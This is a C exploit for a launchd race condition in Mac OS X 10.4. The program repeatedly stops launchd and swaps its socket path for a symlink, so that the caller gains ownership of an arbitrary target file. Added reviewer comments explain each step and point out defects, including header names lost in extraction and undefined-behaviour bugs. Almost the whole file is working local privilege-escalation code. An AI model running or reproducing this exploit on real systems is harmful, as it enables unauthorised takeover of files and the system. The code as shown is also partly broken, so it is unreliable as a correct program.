/*
 * Mac OS X 10.4 launchd race condition exploit
 *
 * Note: sometimes the disk needs a little coercion
 * while ((1));do find / 1>/dev/null 2>&1;done &
 *
 * intropy (intropy caughq.org)
 *
 * What the program does, as far as the code below shows: it repeatedly
 * starts /sbin/launchd as a child, stops the process it guesses to be
 * launchd, swaps the path /var/launchd/501.<pid>/sock for a symlink to the
 * caller-supplied target, resumes it, and loops until stat(target) reports
 * st_uid == getuid().  The weakness this relies on is presumably a privileged
 * process acting on a path in a directory another user can modify, so that a
 * symlink planted between creation and use redirects the operation; the page
 * does not show the launchd side, so that part is inferred.
 */

/*
 * NOTE(review): the seven #include directives below lost their header names
 * when this page was extracted; the file does not preprocess as shown and the
 * page gives no way to recover which headers were named.  The functions used
 * (printf, malloc, strncpy, stat, getuid, fork, system, kill, unlink,
 * symlink) all come from the standard C library and POSIX.
 */
#include
#include
#include
#include
#include
#include
#include

/*
 * Entry point.  argv[1] is the path whose ownership the program tries to
 * obtain.  Implicit-int declaration (pre-C99 style).
 *
 * The pid+2 guess, the 10000-iteration spin limit and the exact order of the
 * SIGSTOP/unlink/symlink/SIGCONT calls are all timing-sensitive, which is why
 * this block is documented rather than restructured.
 *
 * Returns 0 once stat(target) reports the caller's uid as owner, -1 when the
 * argument is missing.  The trailing return(1) is unreachable: every exit
 * from the while(1) body is a return or a goto back to the loop label.
 */
main(int argc, char *argv[]) {
    pid_t pid;
    int count, status;    /* status is declared but never used */
    char name[100];       /* socket path built from the guessed launchd pid */
    char target[100];     /* copy of argv[1]; see the strncpy note below */
    /* Heap-allocated stat buffer.  The malloc result is not checked before
     * use and the buffer is never freed (the process leaves via return). */
    struct stat *stats = (struct stat *)malloc(sizeof(struct stat));

    if ( argc < 2 ) {
        /* Usage line.  Only the program name is printed; an argument
         * placeholder after %s appears to have been lost in extraction. */
        fprintf(stderr, "%s \n", argv[0]);
        return(-1);
    }

    /* NOTE(review): target is uninitialised and strncpy only NUL-terminates
     * when argv[1] is shorter than sizeof(target)-1, so an argument of 99 or
     * more characters leaves target unterminated before the printf/stat
     * calls that read it. */
    strncpy(target, argv[1], sizeof(target)-1);
    printf("Going for %s\n", target);

loop:
    /* One attempt per iteration.  A goto loop from inside the body has the
     * same effect as continue. */
    while ( 1 ) {
        /* Success test: the target is now owned by the invoking user.
         * stat()'s return value is ignored, so if target does not exist
         * *stats keeps whatever it held before (uninitialised on the
         * first pass). */
        stat(target, stats);
        if ( stats->st_uid == getuid() ) {
            printf("Got it!\n");
            return(0);
        }

        pid = fork();
        if ( pid == 0 ) {
            /* Child: run /sbin/launchd at lowest priority with the arguments
             * shown, output discarded.  NOTE(review): there is no exit()
             * after system() returns, so the child falls through into the
             * next loop iteration and starts forking on its own. */
            system("nice -n 19 /sbin/launchd -v /bin/ls -lR /var/launchd/ 1>/dev/null 2>&1");
        } else {
            /* Parent.  The launchd process is assumed to receive pid+2
             * (system()'s shell presumably taking pid+1); nothing verifies
             * that guess.  The uid component of the path is hard-coded to
             * 501 rather than taken from getuid(). */
            snprintf(name, sizeof(name)-1, "/var/launchd/501.%d/sock", pid+2);

            /* Empty-body spin: keep sending SIGSTOP until pid+2 exists and
             * accepts the signal, giving up after 10000 tries. */
            for ( count = 0; (kill(pid+2, SIGSTOP)) != 0 && count < 10000; count++ );
            if ( count == 10000 ) {
                printf("count %d\n", count);
                goto loop;
            }

            /* Remove whatever is at the socket path.  While unlink fails
             * (path not created yet), let the stopped process run briefly
             * and stop it again; abort the attempt if it cannot be stopped. */
            while ( (unlink(name)) != 0 ) {
                kill(pid+2, SIGCONT);
                if ( (kill(pid+2, SIGSTOP)) != 0 ) {
                    printf("Couldnt SIGSTOP during unlink\n");
                    goto loop;
                }
            }

            /* Plant a symlink from the socket path to the target, with the
             * same resume/stop retry as above. */
            while ( (symlink(target, name)) != 0 ) {
                kill(pid+2, SIGCONT);
                if ( (kill(pid+2, SIGSTOP)) != 0 ) {
                    printf("Couldnt SIGSTOP during symlink\n");
                    goto loop;
                }
            }
            printf("Created symlink %s -> %s...\n", name, target);

            /* Resume launchd; the stat() at the top of the next iteration
             * decides whether the target's owner has changed. */
            if ( (kill(pid+2, SIGCONT)) != 0 ) {
                /* NOTE(review): the format string has a %s conversion but no
                 * matching argument, so this printf reads an unspecified
                 * value (undefined behaviour). */
                printf("Couldnt SIGCONT after symlink %s\n");
                goto loop;
            }
        }
    }
    return(1);
}